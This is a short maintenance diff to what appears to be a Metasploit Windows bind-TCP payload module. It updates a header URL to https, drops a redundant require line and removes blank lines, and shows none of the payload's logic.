@@ -1,10 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/bind_tcp'
 
@@ -36,5 +34,4 @@ module MetasploitModule
   def use_ipv6
     true
   end
-
 end
